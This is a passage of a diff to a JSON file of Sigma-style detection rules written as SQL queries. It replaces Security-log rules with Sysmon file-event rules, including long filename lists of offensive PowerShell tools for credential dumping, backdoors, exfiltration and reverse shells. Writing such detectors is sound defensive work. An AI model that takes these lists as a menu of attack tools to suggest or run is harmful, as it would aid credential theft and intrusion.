Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Possible FP during log rotation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1137.003" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", - "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "status": "test", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "status": "experimental", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", - "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "status": "experimental", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", - "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "test", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE 